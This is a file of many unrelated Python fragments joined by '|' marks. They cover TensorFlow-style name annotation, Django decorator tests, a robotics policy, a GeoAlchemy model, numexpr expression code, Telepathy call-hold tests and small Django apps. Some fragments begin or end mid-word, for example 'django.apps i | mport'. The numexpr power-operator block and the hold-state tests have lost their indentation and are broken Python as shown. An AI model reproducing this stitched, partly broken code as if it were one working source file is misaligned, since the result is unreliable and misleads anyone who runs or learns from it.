    # Only composite QNs (attr or subscript) have a parent.
    if self._parent is None:
      raise ValueError('Cannot get parent of simple name "%s".' % self.qn[0])
    return self._parent
  @property
  def owner_set(self):
    """Returns all the symbols (simple or composite) that own this QN.

    In other words, if this symbol was modified, the symbols in the owner set
    may also be affected.

    Examples:
      'a.b[c.d]' has two owners, 'a' and 'a.b'
    """
    owners = set()
    if self.has_attr() or self.has_subscript():
      owners.add(self.parent)
      owners.update(self.parent.owner_set)
    return owners
  @property
  def support_set(self):
    """Returns the set of simple symbols that this QN relies on.

    This would be the smallest set of symbols necessary for the QN to
    statically resolve (assuming properties and index ranges are verified
    at runtime).

    Examples:
      'a.b' has only one support symbol, 'a'
      'a[i]' has two support symbols, 'a' and 'i'
    """
    # TODO(mdanatg): This might be the set of Name nodes in the AST. Track those?
    roots = set()
    if self.has_attr():
      roots.update(self.parent.support_set)
    elif self.has_subscript():
      # Both the container and the index contribute support symbols.
      roots.update(self.parent.support_set)
      roots.update(self.qn[1].support_set)
    else:
      roots.add(self)
    return roots
  def __hash__(self):
    # The attr/subscript flags disambiguate a.b from a[b] with equal parts.
    return hash(self.qn + (self._has_attr, self._has_subscript))
  def __eq__(self, other):
    return (isinstance(other, QN) and self.qn == other.qn and
            self.has_subscript() == other.has_subscript() and
            self.has_attr() == other.has_attr())
  def __str__(self):
    # Reconstructs source-like syntax: a[b], a.b, or the bare base.
    if self.has_subscript():
      return str(self.qn[0]) + '[' + str(self.qn[1]) + ']'
    if self.has_attr():
      return '.'.join(map(str, self.qn))
    else:
      return str(self.qn[0])
  def __repr__(self):
    return str(self)
  def ssf(self):
    """Simple symbol form."""
    # Flattens the QN into a single identifier, joining components with
    # '_' ('_sub_' for subscript QNs).
    ssfs = [n.ssf() if isinstance(n, QN) else n for n in self.qn]
    ssf_string = ''
    for i in range(0, len(self.qn) - 1):
      if self.has_subscript():
        delimiter = '_sub_'
      else:
        delimiter = '_'
      ssf_string += ssfs[i] + delimiter
    return ssf_string + ssfs[-1]
  def ast(self):
    """Determine gast.Node type of current object."""
    # The caller must adjust the context appropriately.
    if self.has_subscript():
      return gast.Subscript(self.parent.ast(), gast.Index(self.qn[-1].ast()),
                            None)
    if self.has_attr():
      return gast.Attribute(self.parent.ast(), self.qn[-1], None)
    base = self.qn[0]
    if isinstance(base, str):
      return gast.Name(base, None, None)
    elif isinstance(base, StringLiteral):
      return gast.Str(base.value)
    elif isinstance(base, NumberLiteral):
      return gast.Num(base.value)
    else:
      assert False, ('the constructor should prevent types other than '
                     'str, StringLiteral and NumberLiteral')
class QnResolver(gast.NodeTransformer):
    """Annotates nodes with QN information.

    Note: Not using NodeAnnos to avoid circular dependencies.
    """

    def visit_Name(self, node):
        node = self.generic_visit(node)
        anno.setanno(node, anno.Basic.QN, QN(node.id))
        return node

    def visit_Attribute(self, node):
        node = self.generic_visit(node)
        if anno.hasanno(node.value, anno.Basic.QN):
            parent_qn = anno.getanno(node.value, anno.Basic.QN)
            anno.setanno(node, anno.Basic.QN, QN(parent_qn, attr=node.attr))
        return node

    def visit_Subscript(self, node):
        # TODO(mdanatg): This may no longer apply if we overload getitem.
        node = self.generic_visit(node)
        s = node.slice
        if not isinstance(s, gast.Index):
            # TODO(mdanatg): Support range and multi-dimensional indices.
            # Continuing silently because some demos use these.
            return node
        if isinstance(s.value, gast.Num):
            subscript = QN(NumberLiteral(s.value.n))
        elif isinstance(s.value, gast.Str):
            subscript = QN(StringLiteral(s.value.s))
        elif anno.hasanno(s.value, anno.Basic.QN):
            # The index may be an expression, case in which a name doesn't
            # make sense.
            subscript = anno.getanno(s.value, anno.Basic.QN)
        else:
            return node
        if anno.hasanno(node.value, anno.Basic.QN):
            parent_qn = anno.getanno(node.value, anno.Basic.QN)
            anno.setanno(node, anno.Basic.QN,
                         QN(parent_qn, subscript=subscript))
        return node
def resolve(node):
    """Runs QnResolver over *node*, annotating resolvable nodes with QNs."""
    resolver = QnResolver()
    return resolver.visit(node)
def from_str(qn_str):
    """Parses a Python expression string and returns its QN annotation."""
    parsed = parsing.parse_expression(qn_str)
    annotated = resolve(parsed)
    return anno.getanno(annotated, anno.Basic.QN)
|
from datetime import datetime, timedelta
from django import http
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.test import RequestFactory
from django.utils.encoding import force_text
from unittest import mock
import pytest
from olympia import amo
from olympia.amo import decorators
from olympia.amo.tests import TestCase, fxa_login_link
from olympia.users.models import UserProfile
# Every test in this module needs database access.
pytestmark = pytest.mark.django_db
def test_post_required():
    """post_required rejects GET with a 405 and passes POST through."""
    def view(request):
        return mock.sentinel.response

    wrapped = decorators.post_required(view)
    request = mock.Mock()

    request.method = 'GET'
    assert isinstance(wrapped(request), http.HttpResponseNotAllowed)

    request.method = 'POST'
    assert wrapped(request) == mock.sentinel.response
def test_json_view():
    """Turns a Python object into a JSON response."""
    def view(request):
        return {'x': 1}

    response = decorators.json_view(view)(mock.Mock())
    assert isinstance(response, http.HttpResponse)
    assert response.status_code == 200
    assert response['Content-Type'] == 'application/json'
    assert force_text(response.content) == '{"x": 1}'
def test_json_view_normal_response():
    """Responses that already are HttpResponses get passed through as-is."""
    expected = http.HttpResponseForbidden()

    def view(request):
        return expected

    actual = decorators.json_view(view)(mock.Mock())
    assert actual is expected
    assert actual['Content-Type'] == 'text/html; charset=utf-8'
def test_json_view_error():
    """json_view.error returns 400 responses."""
    response = decorators.json_view.error({'msg': 'error'})
    assert isinstance(response, http.HttpResponseBadRequest)
    assert response['Content-Type'] == 'application/json'
    assert force_text(response.content) == '{"msg": "error"}'
def test_json_view_status():
    """A custom status_code is propagated to the response."""
    def view(request):
        return {'x': 1}

    wrapped = decorators.json_view(view, status_code=202)
    assert wrapped(mock.Mock()).status_code == 202
def test_json_view_response_status():
    """json_response honors the given status_code."""
    response = decorators.json_response({'msg': 'error'}, status_code=202)
    assert response.status_code == 202
    assert response['Content-Type'] == 'application/json'
    assert force_text(response.content) == '{"msg": "error"}'
class TestLoginRequired(TestCase):
    """Tests for the login_required decorator."""

    def setUp(self):
        super(TestLoginRequired, self).setUp()
        self.f = mock.Mock()
        self.f.__name__ = 'function'
        self.request = RequestFactory().get('/path')
        self.request.user = AnonymousUser()
        self.request.session = {}

    def test_normal(self):
        """Anonymous users are redirected (302) to the FxA login page."""
        view = decorators.login_required(self.f)
        response = view(self.request)
        assert not self.f.called
        assert response.status_code == 302
        expected = fxa_login_link(request=self.request, to='/path')
        assert response['Location'] == expected

    def test_no_redirect(self):
        """With redirect=False anonymous users get a plain 401."""
        view = decorators.login_required(self.f, redirect=False)
        response = view(self.request)
        assert not self.f.called
        assert response.status_code == 401

    def test_decorator_syntax(self):
        """The decorator also works when given its arguments first."""
        # @login_required(redirect=False)
        view = decorators.login_required(redirect=False)(self.f)
        response = view(self.request)
        assert not self.f.called
        assert response.status_code == 401

    def test_no_redirect_success(self):
        """Authenticated users reach the wrapped view."""
        view = decorators.login_required(redirect=False)(self.f)
        self.request.user = UserProfile()
        view(self.request)
        assert self.f.called
class TestSetModifiedOn(TestCase):
    """Tests for the set_modified_on decorator."""

    fixtures = ['base/users']

    @decorators.set_modified_on
    def some_method(self, worked):
        return worked

    def test_set_modified_on(self):
        """On success the referenced object gets a fresh modified date."""
        user = UserProfile.objects.latest('pk')
        self.some_method(True, set_modified_on=user.serializable_reference())
        refreshed = UserProfile.objects.get(pk=user.pk)
        assert refreshed.modified.date() == datetime.today().date()

    def test_not_set_modified_on(self):
        """On failure the modified date is left untouched."""
        yesterday = datetime.today() - timedelta(days=1)
        qs = UserProfile.objects.all()
        qs.update(modified=yesterday)
        user = qs.latest('pk')
        self.some_method(False, set_modified_on=user.serializable_reference())
        refreshed = UserProfile.objects.get(pk=user.pk)
        assert refreshed.modified.date() < datetime.today().date()
class TestPermissionRequired(TestCase):
    """Tests for the permission_required decorator."""

    empty_permission = amo.permissions.NONE

    def setUp(self):
        super(TestPermissionRequired, self).setUp()
        self.f = mock.Mock()
        self.f.__name__ = 'function'
        self.request = mock.Mock()

    @mock.patch('olympia.access.acl.action_allowed')
    def test_permission_not_allowed(self, action_allowed):
        """A denied ACL check raises PermissionDenied."""
        action_allowed.return_value = False
        view = decorators.permission_required(self.empty_permission)(self.f)
        with self.assertRaises(PermissionDenied):
            view(self.request)

    @mock.patch('olympia.access.acl.action_allowed')
    def test_permission_allowed(self, action_allowed):
        """An allowed ACL check lets the wrapped view run."""
        action_allowed.return_value = True
        view = decorators.permission_required(self.empty_permission)(self.f)
        view(self.request)
        assert self.f.called

    @mock.patch('olympia.access.acl.action_allowed')
    def test_permission_allowed_correctly(self, action_allowed):
        """The permission object is forwarded to the ACL check unchanged."""
        view = decorators.permission_required(amo.permissions.ANY_ADMIN)(self.f)
        view(self.request)
        action_allowed.assert_called_with(
            self.request, amo.permissions.AclPermission('Admin', '%'))
|
from __future__ import unicode_literals
from django.apps i | mport AppConfig
class RfhistoryConfig(AppConfig):
    """Django AppConfig for the RFHistory application."""
    # NOTE(review): 'name' must match the app's importable package name
    # (case-sensitive) -- confirm the package really is 'RFHistory'.
    name = 'RFHistory'
|
import numpy as np
from metaworld.policies.action import Action
from metaworld.policies.policy import Policy, assert_fully_parsed, move
class SawyerCoffeeButtonV1Policy(Policy):
    """Scripted policy for the coffee-button task: align with the mug in x,
    then push forward (+y) into the button. The gripper stays open."""

    @staticmethod
    @assert_fully_parsed
    def _parse_obs(obs):
        """Splits the flat observation vector into named components."""
        return {
            'hand_pos': obs[:3],
            'mug_pos': obs[3:6],
            'unused_info': obs[6:],
        }

    def get_action(self, obs):
        """Computes one step's action toward the desired hand position."""
        parsed = self._parse_obs(obs)

        action = Action({
            'delta_pos': np.arange(3),
            'grab_effort': 3
        })
        action['delta_pos'] = move(
            parsed['hand_pos'], to_xyz=self._desired_pos(parsed), p=10.)
        action['grab_effort'] = -1.

        return action.array

    @staticmethod
    def _desired_pos(o_d):
        """Target hand position given the parsed observation."""
        hand = o_d['hand_pos']
        target = o_d['mug_pos'] + np.array([.0, .0, .01])

        if abs(hand[0] - target[0]) > 0.02:
            # Not lined up in x yet: move over the target at a safe height.
            return np.array([target[0], hand[1], .28])
        # Lined up: press forward in +y.
        return hand + np.array([.0, .1, .0])
|
from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.ext.de | clarative import declarative_base
from geoalchemy import GeometryColumn, LineString, GeometryDDL
# Connect to the local FeatureServer database at import time.
# NOTE(review): 'postgres://' is the legacy SQLAlchemy URL scheme (newer
# versions require 'postgresql://') -- confirm the installed version
# still accepts it.
engine = create_engine('postgres://michel@localhost/featureserver', echo=False)
# Session bound to the engine, created immediately on import.
session = sessionmaker(bind=engine)()
metadata = MetaData(engine)
# Declarative base sharing the bound metadata.
Base = declarative_base(metadata=metadata)
class Road(Base):
    """Declarative model for a road: a named 2D line geometry."""

    __tablename__ = 'fs_alchemy_road'

    # Surrogate primary key.
    id = Column(Integer, primary_key=True)
    # Human-readable road name; required.
    name = Column(Unicode, nullable=False)
    # Road width; units not specified here -- TODO confirm against schema docs.
    width = Column(Integer)
    # 2-dimensional line geometry (GeoAlchemy column).
    geom = GeometryColumn(LineString(2))

# Register DDL extensions so CREATE/DROP TABLE also manage the geometry column.
GeometryDDL(Road.__table__)
|
"""
WSGI config for artge projec | t.
It exposes the WSGI callable as a module-level variable named ``application``.
For more informatio | n on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "artge.settings")
application = get_wsgi_application()
|
f | rom FileBundleTestCase import FileBundleTestCase
import unittest
|
class BasicTests(unittest.TestCase, FileBundleTestCase):
    """Runs the shared FileBundleTestCase checks under unittest.

    The mixin supplies the actual test methods; no extra body is needed.
    """
    pass
: 'double', complex: 'complex', str: 'str'}
# Inverse of type_to_kind: maps a kind name back to its Python type.
# NOTE: this module targets Python 2 ('long' is the builtin); 'double' is
# defined elsewhere in this module.
kind_to_type = {'bool': bool, 'int': int, 'long': long, 'float': float,
                'double': double, 'complex': complex, 'str': str}
# Kinds ordered from narrowest to widest, used for type promotion;
# 'none' is the sentinel for "no kind".
kind_rank = ['bool', 'int', 'long', 'float', 'double', 'complex', 'none']
from numexpr import interpreter
class Expression(object):
    """Namespace object whose attribute lookups create variable nodes."""

    def __init__(self):
        object.__init__(self)

    def __getattr__(self, name):
        # Private names resolve against the instance dict; anything else
        # becomes a fresh VariableNode of the default kind.
        if not name.startswith('_'):
            return VariableNode(name, default_kind)
        return self.__dict__[name]
# Singleton entry point: ``E.x`` yields a VariableNode named 'x'.
E = Expression()
class Context(threading.local):
    """Thread-local evaluation context, initialized at most once per thread."""

    # Flipped to True by the first (and only allowed) __init__ call.
    initialized = False

    def __init__(self, dict_):
        if self.initialized:
            raise SystemError('__init__ called too many times')
        self.initialized = True
        self.__dict__.update(dict_)

    def get(self, value, default):
        """Looks up a context entry, falling back to *default*."""
        return self.__dict__.get(value, default)

    def get_current_context(self):
        """Returns the raw dict backing this thread's context."""
        return self.__dict__

    def set_new_context(self, dict_):
        """Merges *dict_* into this thread's context."""
        self.__dict__.update(dict_)
# This will be called each time the local object is used in a separate thread
# (threading.local re-runs __init__ per thread with the same arguments).
_context = Context({})
def get_optimization():
    """Returns the current thread's optimization level ('none' if unset)."""
    return _context.get('optimization', 'none')
# helper functions for creating __magic__ methods
def ophelper(f):
    """Decorator for operator builders.

    Wraps constant arguments in ConstantNode and rejects anything that is
    not an ExpressionNode; name, docstring and attribute dict of *f* are
    copied onto the wrapper.
    """
    def func(*args):
        coerced = []
        for arg in args:
            if isConstant(arg):
                arg = ConstantNode(arg)
            if not isinstance(arg, ExpressionNode):
                raise TypeError("unsupported object type: %s" % (type(arg),))
            coerced.append(arg)
        return f(*coerced)
    func.__name__ = f.__name__
    func.__doc__ = f.__doc__
    func.__dict__.update(f.__dict__)
    return func
def allConstantNodes(args):
    "returns True if args are all ConstantNodes."
    return all(isinstance(x, ConstantNode) for x in args)
def isConstant(ex):
    "Returns True if ex is a constant scalar of an allowed type."
    # 'long' is the Python 2 builtin; 'double' is this module's alias for
    # the wide float type (defined elsewhere in the module).
    return isinstance(ex, (bool, int, long, float, double, complex, str))
def commonKind(nodes):
    """Returns the widest kind among *nodes*, per the kind_rank ordering.

    Strings never mix with other kinds: either every node is 'str', or
    none may be.
    """
    kinds = [node.astKind for node in nodes]
    n_str = kinds.count('str')
    if 0 < n_str < len(kinds):  # some args are strings, but not all
        raise TypeError("strings can only be operated with strings")
    if n_str > 0:  # if there are some, all of them must be
        return 'str'
    best = -1
    for kind in kinds:
        best = max(best, kind_rank.index(kind))
    # An empty input yields kind_rank[-1] == 'none'.
    return kind_rank[best]
# Bounds of a signed 32-bit integer; constants outside this range are
# always promoted to 'long', regardless of platform.
max_int32 = 2147483647
min_int32 = -max_int32 - 1
def bestConstantType(x):
    """Returns the narrowest Python type that exactly represents constant *x*.

    NOTE: Python 2 module -- relies on the 'long' builtin and the
    'except E, name' syntax.
    """
    if isinstance(x, str):  # ``numpy.string_`` is a subclass of ``str``
        return str
    # ``long`` objects are kept as is to allow the user to force
    # promotion of results by using long constants, e.g. by operating
    # a 32-bit array with a long (64-bit) constant.
    if isinstance(x, (long, numpy.int64)):
        return long
    # ``double`` objects are kept as is to allow the user to force
    # promotion of results by using double constants, e.g. by operating
    # a float (32-bit) array with a double (64-bit) constant.
    if isinstance(x, (double)):
        return double
    # Numeric conversion to boolean values is not tried because
    # ``bool(1) == True`` (same for 0 and False), so 0 and 1 would be
    # interpreted as booleans when ``False`` and ``True`` are already
    # supported.
    if isinstance(x, (bool, numpy.bool_)):
        return bool
    # ``long`` is not explicitly needed since ``int`` automatically
    # returns longs when needed (since Python 2.3).
    # The duality of float and double in Python avoids that we have to list
    # ``double`` too.
    for converter in int, float, complex:
        try:
            y = converter(x)
        except StandardError, err:
            # Conversion failed; try the next (wider) converter.
            continue
        if x == y:
            # Constants needing more than 32 bits are always
            # considered ``long``, *regardless of the platform*, so we
            # can clearly tell 32- and 64-bit constants apart.
            if converter is int and not (min_int32 <= x <= max_int32):
                return long
            return converter
    # NOTE(review): falls through to an implicit None when no converter
    # round-trips -- confirm callers handle that.
def getKind(x):
    """Returns the kind name for the constant *x*."""
    return type_to_kind[bestConstantType(x)]
def binop(opname, reversed=False, kind=None):
    """Builds a binary-operator method named *opname*.

    Two constant operands are folded eagerly; otherwise an OpNode is
    emitted with the given (or inferred) kind.
    """
    # Getting the named method from self (after reversal) does not
    # always work (e.g. int constants do not have a __lt__ method).
    opfunc = getattr(operator, "__%s__" % opname)

    @ophelper
    def operation(self, other):
        if reversed:
            self, other = other, self
        if not allConstantNodes([self, other]):
            return OpNode(opname, (self, other), kind=kind)
        return ConstantNode(opfunc(self.value, other.value))
    return operation
def func(func, minkind=None, maxkind=None):
    """Wraps *func* as an expression-tree function-node builder.

    Constant arguments are folded eagerly. Otherwise the node kind is the
    promoted common kind of the arguments, clamped sequentially by
    *minkind* then *maxkind*.
    """
    @ophelper
    def function(*args):
        if allConstantNodes(args):
            folded = func(*[x.value for x in args])
            return ConstantNode(folded)
        kind = commonKind(args)
        if kind in ('int', 'long'):
            # Exception for following NumPy casting rules
            kind = 'double'
        else:
            # Apply regular casting rules (note: the maxkind clamp looks at
            # the possibly already-raised kind).
            if minkind and kind_rank.index(minkind) > kind_rank.index(kind):
                kind = minkind
            if maxkind and kind_rank.index(maxkind) < kind_rank.index(kind):
                kind = maxkind
        return FuncNode(func.__name__, args, kind)
    return function
@ophelper
def where_func(a, b, c):
    """where(cond, b, c): elementwise selection node; constants fold eagerly."""
    if isinstance(a, ConstantNode):
        raise ValueError("too many dimensions")
    if allConstantNodes([a, b, c]):
        return ConstantNode(numpy.where(a, b, c))
    return FuncNode('where', [a, b, c])
def encode_axis(axis):
    """Encodes a reduction-axis argument as a RawNode for the interpreter."""
    if isinstance(axis, ConstantNode):
        axis = axis.value
    if axis is None:
        return RawNode(interpreter.allaxes)
    if axis < 0:
        # NOTE(review): negative axes map via maxdims - axis; confirm this
        # matches the interpreter's convention.
        axis = interpreter.maxdims - axis
    if axis > 254:
        raise ValueError("cannot encode axis")
    return RawNode(axis)
def sum_func(a, axis=-1):
    """Builds a 'sum' reduction node over *axis*."""
    axis = encode_axis(axis)
    # NOTE(review): the ConstantNode short-circuit happens *before* scalar
    # promotion here, but *after* it in prod_func -- so sum of a bare scalar
    # yields a FuncNode while prod yields a ConstantNode. Confirm which
    # ordering is intended and align the two.
    if isinstance(a, ConstantNode):
        return a
    if isinstance(a, (bool, int, long, float, double, complex)):
        a = ConstantNode(a)
    return FuncNode('sum', [a, axis], kind=a.astKind)
def prod_func(a, axis=-1):
    """Builds a 'prod' reduction node over *axis*."""
    axis = encode_axis(axis)
    # Scalars are promoted first, so a constant scalar short-circuits to a
    # ConstantNode here (unlike sum_func, which checks before promoting).
    if isinstance(a, (bool, int, long, float, double, complex)):
        a = ConstantNode(a)
    if isinstance(a, ConstantNode):
        return a
    return FuncNode('prod', [a, axis], kind=a.astKind)
@ophelper
def div_op(a, b):
    """Division node; under moderate/aggressive optimization, dividing by a
    float/double/complex constant becomes multiplication by its inverse."""
    if get_optimization() in ('moderate', 'aggressive'):
        const_divisor = (isinstance(b, ConstantNode) and
                         a.astKind == b.astKind and
                         a.astKind in ('float', 'double', 'complex'))
        if const_divisor:
            return OpNode('mul', [a, ConstantNode(1./b.value)])
    return OpNode('div', [a, b])
@ophelper
def pow_op(a, b):
if allConstantNodes([a,b]):
return ConstantNode(a**b)
if isinstance(b, ConstantNode):
x = b.value
if get_optimization() == 'aggressive':
RANGE = 50 # Approximate break even point with pow(x,y)
# Optimize all integral and half integral powers in [-RANGE, RANGE]
# Note: for complex numbers RANGE could be larger.
if (int(2*x) == 2*x) and (-RANGE <= abs(x) <= RANGE):
n = int(abs(x))
ishalfpower = int(abs(2*x)) % 2
def multiply(x, y):
if x is None: return y
return OpNode('mul', [x, y])
r = None
p = a
mask = 1
while True:
if (n & mask):
r = multiply(r, p)
mask <<= 1
if mask > n:
break
p = OpNode('mul', [p,p])
if ishalfpower:
kind = commonKind([a])
if kind in ('int', 'long'): kind = 'double'
r = multiply(r, OpNode('sqrt', [a], kind))
if r is None:
r = OpNode('ones_like', [a])
if x < 0:
|
State()
assert hold_state[0] == cs.HS_HELD, hold_state
# Check that Gabble doesn't send another <hold/>, or send <unhold/>
# before we change our minds.
q.forbid_events(self.unhold_event + self.hold_event)
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
call_async(q, chan.Hold, 'RequestHold', True)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_HOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
cstream.CompleteReceivingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
cstream.CompleteSendingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_HELD, cs.HSR_REQUESTED]),
)
hold_state = chan.Hold.GetHoldState()
assert hold_state[0] == cs.HS_HELD, hold_state
sync_stream(q, stream)
q.unforbid_events(self.unhold_event + self.hold_event)
# ---- Test 10: attempting to unhold fails in the sending bit ----
# Check that Gabble doesn't send another <hold/>, or send <unhold/> even
# though unholding fails.
q.forbid_events(self.unhold_event + self.hold_event)
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-return', method='RequestHold', value=()),
)
cstream.ReportSendingFailure(0, "", "",
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_HOLD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
cstream.CompleteReceivingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_HELD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
# ---- Test 11: attempting to unhold fails in the receiving bit ----
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-return', method='RequestHold', value=()),
)
cstream.ReportReceivingFailure(0, "", "",
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_HOLD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
cstream.CompleteSendingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_HELD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
sync_stream(q, stream)
q.unforbid_events(self.unhold_event + self.hold_event)
# ---- Test 12: when we successfully unhold, the peer gets <unhold/> ---
q.forbid_events(self.unhold_event)
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-return', method='RequestHold', value=()),
)
# Ensure that if Gabble sent the <unhold/> stanza too early it's already
# arrived.
sync_stream(q, stream)
q.unforbid_events(self.unhold_event)
c | stream.CompleteReceivingStateChange(
cs.CALL_STREAM_FLOW_S | TATE_STARTED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
cstream.CompleteSendingStateChange(
cs.CALL_STREAM_FLOW_STATE_STARTED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged |
from .pyvatebin impor | t ap | p
|
# coding=utf-8
"""
Lets the user interactively assign groups to all cards that have no
group yet.
"""
import data

# Ids of cards that are not referenced by any group-membership row.
ungrouped = data.database_manager.get_connection().execute(
    "SELECT card_id FROM card WHERE card_id NOT IN (SELECT card_id FROM card_group_membership)").fetchall()
cards = [data.database_manager.get_card(card_id) for card_id, in ungrouped]
print(len(cards))

# Drop duplicates while preserving order (cards may be unhashable, so
# membership is checked against the deduplicated list directly).
deduped = []
for card in cards:
    if card not in deduped:
        deduped.append(card)
print(len(deduped))
cards = deduped

# The previous answer is reused as the default for the next card.
group_name = "adeo-11"
for card_id, translations in cards:
    for translation in translations:
        print(translation)
    answer = input("group_name? {} > ".format(group_name)).strip(" ")
    if answer != "":
        group_name = answer
    data.database_manager.add_card_to_group(card_id, group_name)
|
from markdown import markdown
from django.db import models
from django.core.urlresolvers import reverse
class Tag(models.Model):
    """
    A subject-matter tag for blog posts
    """
    # BUG FIX: the field types were swapped -- ``slug`` (used to build URLs
    # in get_absolute_url) must be a SlugField, and the display ``name`` a
    # plain CharField. Requires a schema migration.
    slug = models.SlugField(max_length=200, unique=True)
    name = models.CharField(max_length=200, unique=True)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        """URL of the tag's listing page."""
        return reverse('tag', args=(self.slug,))

    class Meta:
        ordering = ('name',)
class Post(models.Model):
    """
    A blog post
    """
    title = models.CharField(max_length=200, unique=True)
    slug = models.SlugField(max_length=50, unique=True)
    body = models.TextField()
    date = models.DateField(auto_now_add=True)
    tags = models.ManyToManyField(Tag)

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        """URL of the post's detail page."""
        return reverse('post', args=(self.slug,))

    def teaser(self):
        """The first 100 characters of the body, followed by an ellipsis."""
        return self.body[:100] + ' ...'

    def body_html(self):
        """The body rendered from Markdown to HTML."""
        return markdown(self.body)

    class Meta:
        ordering = ('title', 'date', 'body')
|
; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
### BEGIN LICENSE
# Copyright (C) 2012 Jono Bacon <jono@ubuntu.com>
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
